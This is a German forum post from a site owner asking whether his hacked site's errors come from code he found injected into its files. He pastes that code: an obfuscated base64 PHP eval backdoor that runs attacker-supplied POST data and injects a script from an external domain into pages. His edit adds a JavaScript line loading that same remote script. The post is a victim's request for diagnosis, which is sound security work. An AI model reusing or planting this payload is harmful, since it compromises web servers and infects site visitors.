Hallo zusammen!
Ich habe eben eine meiner Seiten besucht und festgestellt, dass diese nicht funktioniert
Als Fehlermeldung kam in etwa folgendes:
In einigen Dateien habe ich folgenden Code entdeckt:Fatal error: Cannot redeclare nogc() (previously declared in /srv/www/htdocs/web288/html/system/constants.php(1) : eval()'d code:1) in /srv/www/htdocs/web288/html/system/libraries/Config.php(1) : eval()'d code on line 1
Wurde die Seite gehackt? Woher kommt das? Vor ca. 30 Minuten lief die Seite noch einwandfrei.PHP-Code:
<?php eval(base64_decode('aWYoIWlzc2V0KCRub2djMSkpe2Z1bmN0aW9uIG5vZ2MoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyVnNaWFpsWkdGdWVtRXVZMjl0TDJGeVkyaHBkbTl6TDB4QlgwNUJRMGxQVGw4eU1EQTRMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gbm9nYzIoJGEsJGIsJGMsJGQpe2dsb2JhbCAkbm9nYzE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJG5vZ2MxKSljYWxsX3VzZXJfZnVuYygkbm9nYzEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSkgYXMgJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nbm9nYycpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdub2djJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JG5vZ2NsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdub2djMicpKSE9J25vZ2MyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>
Grüße
Markus
//EDIT:
in einigen js-Scripts finde ich einen Bezug auf folgendes Script
Code:document.write('<script src=http://elevedanza.com/archivos/LA_NACION_2008.php ><\/script>');
Lesezeichen